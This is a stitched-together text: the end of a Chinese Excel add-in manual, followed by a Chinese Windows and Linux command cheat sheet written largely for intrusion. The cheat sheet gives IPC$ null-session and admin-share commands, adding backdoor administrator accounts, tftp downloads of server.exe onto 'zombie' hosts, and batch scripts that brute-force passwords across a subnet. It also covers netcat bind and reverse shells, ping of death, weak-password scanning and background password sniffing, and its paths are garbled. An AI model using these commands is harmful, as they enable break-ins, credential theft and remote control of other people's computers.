取存储格的数字金额中包含对应人民币面额(100/50/20/10/5/2/1等)的张数。第一个参数即单元格引用,第二个参数为人民币(RMB)面额。 GetTax 计算个人所得税工具。第一个参数为计税总额,第二个参数为扣除数额。 GetTypeValue 将存储格的内容按需求进行字符分离与表达式计算。第一个参数即单元格引用,第二个参数即类型取值范围为1-10(1-只保留数字. 2-只保留字母. 3-只留中文(包含空格). 4-只保留数字和小数点. 5-只保留数字和运算符号+-*/^. 6-只保留字母和数字. 7-去掉数字. 8-去除英文大小写字符. 9-去除中文. 10-这里指去除所有空格符)。 HZtoPY 将存储格的内容中的中文汉字转换为拼音。第一个参数为单元格引用,第二个参数为是否只对汉字转换(1或0),第三个参数为间隔符号。后面两个参数可以省略。 NumInt 将存储格的数字金额转换为按整数四舍五入的整数金额。第一个参数即单元格引用,第二个参数为人民币面额(取值为5或10)。例如:NumInt(9825.65,5)=9825, NumInt(9825.65,10)=9830。面值参数越大差异越大。 NumIntDown 将存储格的数字金额转换为向下按整数四舍五入的整数金额。第一个参数即单元格引用,第二个参数为人民币面额(取值为5或10)。例: NumIntDown(9825.65,5)=9820, NumIntDown(9825.65,10)=9820。面值参数越大差异越大。 NumIntUp 将存储格的数字金额转换为向上按整数四舍五入的整数金额。第一个参数即单元格引用,第二个参数为人民币面额(取值为5或10)。例如:NumIntUp(9825.65,5)=9830, NumIntUp(9825.65,10)=9830。面值参数越大差异越大。 ReplaceIn 字符替换含数。第一个参数为字符串表达式或单元格引用,第二个参数为要查找的字符串,第三个参数为新替换的字符串,第四个参数为从找到的第N个字符开始替换。 RightFind 从右向左查找字符串的函数。例如:RightFind("BCADEA","A")=6 存 储 格 操 作 CheckId 身份证信息查询及验证函数。一个参数即为单元格引用或身份证号码字符串。返回信息为:地区信息+出生年月日+性别+出生序号+是否验证成功。可取身份证前2位或4位或6位或10位或14位(也可后面以0数字补充)即显示地区信息;完整应取18位身份证字串数据。 ClearBlank 消除空值函数。可以选择多行多列,按先行后列之方式返回值.两个参数,第一个参数为存储格区域引用,第二个参数为需要取数的序号(1--N)。 ColorCount 取存储格范围内某颜色值的存储格个数。第一个参数为储格范围引用,第二个参数为某颜色Index值或某单元格引用。 ColorSum 按背景颜色对区域值求和。第一参数为求和区域,第二参数为背景颜色参照值。 FormulaView 显示公式函数。提取单元格中的公式,第一个参数单元格引用,第二个参数可省略。 GradeAverage 评委评分函数。计算引用存储格区域中去除最大值与最小值之后再求平均数。 GetFolderPathName 用于创建带链接的文件目录,有二个参数,第一参数为指定路径的字符串,第二参数指定取值编号(数字序号1--N)。 GetComment 提取存储格批注中的文字。只有一个参数,即单元格引用。 CommonItem 返回两个存储格区域的共有项目。前两个参数为区域,第三参数为取数序号1--N。 VarianceItem 返回第一区域中有而第二区域没有的项目。前两个参数是区域,第三参数为序号。 SplitGetValue 按分割符取数。第一参数为单元格引用,第二参数表示取第N个字符串,第三个参数表示分割符号,可任意字符。 UnionString 将区域字符进行合并。第一参数为分割符,第二参数为引用区域。可以用""表示不使用分割符。第三参数开始为引用区域,可以有1到254个区域(Excel2003中是1到29个)。也还可以直接用文本做参数。 普通函数 BookName 取工作薄名称目录。一个参数,输入工作薄序号即返回相应工作薄名称。 SheetName 取工作表名称目录。一个参数,输入工作表序号即返回相应工作表名称。 GoldPoint 数学中黄金分割点的精确取值。 PI 数学中PI(π)的精确取值。PI=3.1415926535897932384626433832795. 系统函数 CloseExcel 不保存当前文档而直接退出EXCEL。 ComputerChangeName 更改计算机名称。一个参数即任意的名称字符串。 ComputerLock 电脑进入登出锁定状态。一个可选参数可以省略。 ComputerSleep 电脑进入待机休眠状态。一个可选参数可以省略。 USB USB盘的禁用与恢复启用。一个字符串参数即Enabled为启用,Disabled为禁用。 对于无法安装的朋友请注意以下4点 : 一:必须是完整版OFFICE,不能是绿色版、精简版,它们不支持COM加载宏. 二:必须关闭Excel状态下安装或者删除工具,安装后重启Excel即可. 三:如果是VISTA或WIN 7,必须以管理员用户安装,且从控制面板中关掉用户帐户控制(UAC)功能. 四:如果您装了其它的EXCEL工具,请先关掉它,它们有可能删除本工具的菜单. 安装方法:(也可参考安装说明.TXT文档) 安装说明与使用规则: 1.1.绿色版本安装:管理员用户运行Setup.exe进行安装程序! 运行UnSetup.exe进行反安装程序! 1.2.绿色版本安装:非管理员用户可运行Register.bat进行安装程序! 运行UnRegister.bat进行反安装程序! 2.1.若安装并使用后因误操作报错时(例如EXCEL打开后未能加载工具菜单),可以卸载后重新安装到另外不同的目录中即可恢复正常.(因微软COM的保护措施而致)! 2.2.建议每天只打开EXCEL主程序一次为宜,保持打开状态不要关闭.(文档则可任意多次打开). 3.1.由于免费标签插件ExcelTab.dll与系统的兼容性问题,安装后在使用过程中若出现屏幕微小抖动或影响正常使用时,请将安装目录Librarys中的ExcelTab.dll 文件改名或删除即可! (不过出现的几率为1%左右). 或者请下载后24小时之内将其删除即可,而不会影响本工具箱的功能! ======================================================================================== EXCEL集成工具箱V8.0增强版修正内容: 1.修正LED时钟自动启动的BUG.在工具箱选项中新增加其开关设定. 2.修正EXCEL2007以上版本中不能手工设定不同工作表网格线颜色的问题. 关闭了原自动设定网格线颜色的功能. 3.改进EXCEL2007及EXCEL2010版本中COM加载时间过长的问题,提升了原版的启动速度. 4.提高程式代码执行与加速功能,实行了程序稳定性与谨慎性测试并通过. 5.新增CheckId()身份证信息查询及验证函数. 6.新增4个皮肤包并修正更换皮肤设置后重启即能生效. 未注册版最多支持30个皮肤包,注册版允许最多皮肤包99个. ========================================================================================= 需知更多请访问官方论坛: Http://exceltools.5d6d.com   作者QQ:1058697543
CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) 命令大全 1. gpedit.msc-----组策略 2. sndrec32-------录音机    3. Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。它在 Windows NT/2000/XP 中均可使用,但在 Windows 98 中却没有集成这一个工具。    4. explorer-------打开资源管理器    5. logoff---------注销命令    6. shutdown-------60秒倒计时关机命令    7. lusrmgr.msc----本机用户和组    8. services.msc---本地服务设置    9. oobe/msoobe /a----检查XP是否激活    10. notepad--------打开记事本    11. cleanmgr-------垃圾整理    12. net start messenger----开始信使服务    13. compmgmt.msc---计算机管理    14. net stop messenger-----停止信使服务    15. conf-----------启动netmeeting    16. dvdplay--------DVD播放器    17. charmap--------启动字符映射表    18. diskmgmt.msc---磁盘管理实用程序    19. calc-----------启动计算器    20. dfrg.msc-------磁盘碎片整理程序    21. chkdsk.exe-----Chkdsk磁盘检查    22. devmgmt.msc--- 设备管理器    23. regsvr32 /u *.dll----停止dll文件运行    24. drwtsn32------ 系统医生    25. rononce -p----15秒关机    26. dxdiag---------检查DirectX信息    27. regedt32-------注册表编辑器    28. Msconfig.exe---系统配置实用程序    29. rsop.msc-------组策略结果集    30. mem.exe--------显示内存使用情况    31. regedit.exe----注册表    32. winchat--------XP自带局域网聊天    33. progman--------程序管理器    34. winmsd---------系统信息    35. perfmon.msc----计算机性能监测程序    36. winver---------检查Windows版本    37. sfc /scannow-----扫描错误并复原    38. taskmgr-----任务管理器(2000/xp/2003)    39. regsvr32 /u *.dll----停止dll文件运行    40. wmimgmt.msc----打开windows管理体系结构(WMI)    41. wupdmgr--------windows更新程序    42. wscript--------windows脚本宿主设置    43. write----------写字板    45. wiaacmgr-------扫描仪和照相机向导    46. winchat--------XP自带局域网聊天    49. mplayer2-------简易widnows media player    50. mspaint--------画图板    51. mstsc----------远程桌面连接    53. magnify--------放大镜实用程序    54. mmc------------打开控制台    55. mobsync--------同步命令    57. iexpress-------木马捆绑工具,系统自带    58. fsmgmt.msc-----共享文件夹管理器    59. utilman--------辅助工具管理器    61. dcomcnfg-------打开系统组件服务    62. ddeshare-------打开DDE共享设置    63. osk------------打开屏幕键盘    64. odbcad32-------ODBC数据源管理器    65. oobe/msoobe /a----检查XP是否激活    66. cmd.exe--------CMD命令提示符    67. regsvr32 /u zipfldr.dll------取消ZIP支持    68. ntbackup-------系统备份和还原    69. narrator-------屏幕“讲述人”    70. ntmsmgr.msc----移动存储管理器    71. ntmsoprq.msc---移动存储管理员操作请求    72. netstat -an----(TC)命令检查接口    73. syncapp--------创建一个公文包    74. sysedit--------系统配置编辑器    75. sigverif-------文件签名验证程序    76. ciadv.msc------索引服务程序    77. shrpubw--------创建共享文件夹    78. secpol.msc-----本地安全策略    79. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码    80. services.msc---本地服务设置    81. Sndvol32-------音量控制程序    82. sfc.exe--------系统文件检查器    83. sfc /scannow---windows文件保护    84. ciadv.msc------索引服务程序    85. tourstart------xp简介(安装完成后出现的漫游xp程序)    86. taskmgr--------任务管理器    87. eventvwr-------事件查看器    88. eudcedit-------造字程序    89. compmgmt.msc---计算机管理    90. packager-------对象包装程序    91. perfmon.msc----计算机性能监测程序    92. charmap--------启动字符映射表    93. cliconfg-------SQL SERVER 客户端网络实用程序    94. Clipbrd--------剪贴板查看器    95. conf-----------启动netmeeting    96. certmgr.msc----证书管理实用程序 操作详解 net use ipipc$ " " /user:" " 建立IPC空链接    net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接    net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:    net use h: ipc$ 登陆后映射对方C:到本地为H:    net use ipipc$ /del 删除IPC链接    net use h: /del 删除映射对方到本地的为H:的映射    net user 用户名 密码 /add 建立用户    net user guest /active:yes 激活guest用户    net user 查看有哪些用户    net user 帐户名 查看帐户的属性    net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限    net start 查看开启了哪些服务    net start 服务名 开启服务;(如:net start telnet, net start schedule)    net stop 服务名 停止某服务    net time 目标ip 查看对方时间    net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息    net view 查看本地局域网内开启了哪些共享    net view ip 查看对方局域网内开启了哪些共享    net config 显示系统网络设置    net logoff 断开连接的共享    net pause 服务名 暂停某服务    net send ip "文本信息" 向对方发信息    net ver 局域网内正在使用的网络连接类型和信息    net share 查看本地开启的共享    net share ipc$ 开启ipc$共享    net share ipc$ /del 删除ipc$共享    net share c$ /del 删除C:共享    net user guest 12345 用guest用户登陆后用将密码改为12345    net password 密码 更改系统登陆密码    netstat -a 查看开启了哪些端口,常用netstat -an    netstat -n 查看端口的网络连接情况,常用netstat -an    netstat -v 查看正在进行的工作    netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况    netstat -s 查看正在使用的所有协议使用情况    nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名   tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。   ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。    ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)   ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息    tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)    kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)    del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件   del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)    move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖    fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令    at id号 开启已注册的某个计划任务    at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止    at id号 /delete 停止某个已注册的计划任务   at 查看所有的计划任务    at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机   finger username @host 查看最近有哪些用户登陆    telnet ip 端口 远和登陆服务器,默认端口为23    open ip 连接到IP(属telnet登陆后的命令)    telnet 在本机上直接键入telnet 将进入本机的telnet    copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件    copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下    copy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件    copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:    xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件   用参数/e才可连目录下的子目录一起复制到目标地址下。    tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exec:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送    tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机    ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)    route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface    arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息    start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令    mem 查看cpu使用情况    attrib 文件名(目录名) 查看某文件(目录)的属性    attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性    dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间    date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间    set 指定环境变量名称=要指派给变量的字符 设置环境变量    set 显示当前所有的环境变量    set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量    pause 暂停批处理程序,并显示出:请按任意键继续....    if 在批处理程序中执行条件处理(更多说明见if命令及变量)    goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)    call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)   for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)    echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置    echo 信息 在屏幕上显示出信息    echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中    findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello    find 文件名 查找某文件    title 标题名字 更改CMD窗口标题名字    color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白    prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )    ver 在DOS窗口下显示版本信息    winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)    format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS,例:Format D: /FS:NTFS    md 目录名 创建目录    replace 源文件 要替换文件的目录 替换文件    ren 原文件名 新文件名 重命名文件名    tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称    type 文件名 显示文本文件的内容    more 文件名 逐屏显示输出文件    doskey 要锁定的命令=字符    doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=    taskmgr 调出任务管理器    chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误    tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口    exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe   path 路径可执行文件的文件名 为可执行文件设置一个路径。    cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?    regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;    regedit /e 注册表文件名 导出注册表    cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。    cacls 文件名 查看文件的访问用户权限列表    REM 文本内容 在批处理文件中添加注解    netsh 查看或更改本地网络配置情况    IIS服务命令    iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)    iisreset /start或stop 启动(停止)所有Internet服务    iisreset /restart 停止然后重新启动所有Internet服务    iisreset /status 显示所有Internet服务状态    iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动    iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机   iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务    iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。    FTP 命令:(后面有详细说明内容)    ftp的命令行格式为:   ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。    -d 使用调试方式。    -n 限制ftp的自动登录,即不使用.netrc文件。    -g 取消全局文件名。    help [命令] 或 ?[命令] 查看命令说明    bye 或 quit 终止主机FTP进程,并退出FTP管理方式.    pwd 列出当前远端主机目录    put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中    get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中    mget [remote-files] 从远端主机接收一批文件至本地主机    mput local-files 将本地主机中一批文件传送至远端主机    dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件    ascii 设定以ASCII方式传送文件(缺省值)    bin 或 image 设定以二进制方式传送文件    bell 每完成一次文件传送,报警提示    cdup 返回上一级目录    close 中断与远程服务器的ftp会话(与open对应)    open host[port] 建立指定ftp服务器连接,可指定连接端口    delete 删除远端主机中的文件    mdelete [remote-files] 删除一批文件    mkdir directory-name 在远端主机中建立目录    rename [from] [to] 改变远端主机中的文件名    rmdir directory-name 删除远端主机中的目录    status 显示当前FTP的状态    system 显示远端主机系统类型    user user-name [password] [account] 重新以别的用户名登录远端主机    open host [port] 重新建立一个新的连接    prompt 交互提示模式    macdef 定义宏命令    lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录   chmod 改变远端主机的文件权限    case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母   cd remote-dir 进入远程主机目录    cdup 进入远程主机目录的父目录   ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip   #5    MYSQL 命令    mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。   (例:mysql -h110.110.110.110 -Uroot -P123456   注:u与root可以不用加空格,其它也一样)    exit 退出MYSQL    mysqladmin -u用户名 -p旧密码 password 新密码 修改密码    grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)   show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。   use mysql;    show tables; 显示库中的数据表    describe 表名; 显示数据表的结构    create database 库名; 建库   use 库名;    create table 表名 (字段设定列表); 建表    drop database 库名;    drop table 表名; 删库和删表    delete from 表名; 将表中记录清空    select * from 表名; 显示表中的记录    mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。    win2003系统下新增命令(实用部份):    shutdown /参数 关闭或重启本地或远程主机。   参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。   例:shutdown /r /t 0 立即重启本地主机(无延时)   taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。   参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。    tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。   参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。    Linux系统下基本命令 注:要区分大小写    uname 显示版本信息(同win2K的 ver)    dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)   pwd 查询当前所在的目录位置   cd cd ..回到上一层目录,注意cd 与..之间有空格。 cd /返回到根目录。   cat 文件名 查看文件内容   cat >abc.txt 往abc.txt文件中写上内容。   more 文件名 以一页一页的方式显示一个文本文件。   cp 复制文件    mv 移动文件 rm 文件名 删除文件,rm -a 目录名删除目录及子目录    mkdir 目录名 建立目录    rmdir 删除子目录,目录内没有文档。    chmod 设定档案或目录的存取权限    grep 在档案中查找字符串    diff 档案文件比较    find 档案搜寻    date 现在的日期、时间    who 查询目前和你使用同一台机器的人以及Login时间地点    w 查询目前上机者的详细资料    whoami 查看自己的帐号名称    groups 查看某人的Group    passwd 更改密码    history 查看自己下过的命令    ps 显示进程状态    kill 停止某进程    gcc 黑客通常用它来编译C语言写的文件    su 权限转换为指定使用者    telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。    ftp ftp连接上某服务器(同win2K)    批处理命令与变量    1:for命令及变量 基本格式    FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。    批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use ipipc$ pass /user:user 中ip为%1,pass为%2,user为%3    (set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }    command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开   command_parameters:为特定命令指定参数或命令行开关   IN (set):指在(set)中取值;DO command :指执行command 参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:pass.txt)时 }。    用法举例:   @echo off   echo 用法格式:test.bat *.*.* > test.txt   for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt    存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。   /L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。   @echo off   echo 用法格式:ok.bat ip   FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200   存为:ok.exe 说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。    七:   2:if命令及变量 基本格式   IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。   例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。   0 指发现并成功执行(真);1 指没有发现、没执行(假)。   IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。   例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")   IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。   例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。   IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。当有del命令时需把del命令全部内容用括起来,因为del命令要单独一行时才能执行,用上后就等于是单独一行了;例如:“if exist test.txt. else echo test.txt.missing ”,注意命令中的“.”   系统外部命令   注:系统外部命令(均需下载相关工具)   瑞士军刀:nc.exe    参数说明:   -h 查看帮助信息   -d 后台模式   -e prog程序重定向,一但连接就执行[危险]   -i secs延时的间隔   -l 监听模式,用于入站连接   -L 监听模式,连接天闭后仍然继续监听,直到CTR+C   -n IP地址,不能用域名   -o film记录16进制的传输   -p[空格]端口 本地端口号   -r 随机本地及远程端口   -t 使用Telnet交互方式   -u UDP模式   -v 详细输出,用-vv将更详细   -w数字 timeout延时间隔   -z 将输入,输出关掉(用于扫锚时)   基本用法:   nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口   nc -l -p 80 开启本机的TCP 80端口并监听   nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口   nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口   nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口   高级用法:   nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止   nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt   nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用   type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用   本机上用: nc -l -p 本机端口   在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K   nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙   本机上用:nc -d -l -p 本机端口 存放文件的路径及名称 传送文件到对方主机   备 注:   | 管道命令    重定向命令。“<;”,例如:tlntadmn > d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中   >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。   如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。   八:   扫描工具:xscan.exe   基本格式   xscan -host [-] [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息   xscan -file [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息   检测项目   -active 检测主机是否存活   -os 检测远程操作系统类型(通过NETBIOS和SNMP协议)   -port 检测常用服务的端口状态   -ftp 检测FTP弱口令   -pub 检测FTP服务匿名用户写权限   -pop3 检测POP3-Server弱口令   -smtp 检测SMTP-Server漏洞   -sql 检测SQL-Server弱口令   -smb 检测NT-Server弱口令   -iis 检测IIS编码/解码漏洞   -cgi 检测CGI漏洞   -nasl 加载Nessus攻击脚本   -all 检测以上所有项目   其它选项   -i 适配器编号 设置网络适配器,可通过"-l"参数获取   -l 显示所有网络适配器   -v 显示详细扫描进度   -p 跳过没有响应的主机   -o 跳过没有检测到开放端口的主机   -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量,默认数量为100,10 -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)   用法示例   xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机   xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机   xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机   九:   命令行方式嗅探器: xsniff.exe   可捕获局域网内FTP/SMTP/POP3/HTTP协议密码   参数说明   -tcp 输出TCP数据报   -udp 输出UDP数据报   -icmp 输出ICMP数据报   -pass 过滤密码信息   -hide 后台运行   -host 解析主机名   -addr IP地址 过滤IP地址   -port 端口 过滤端口   -log 文件名 将输出保存到文件   -asc 以ASCII形式输出   -hex 以16进制形式输出   用法示例   xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中   xsniff.exe -tcp -udp -asc -addr 192.168.1.1 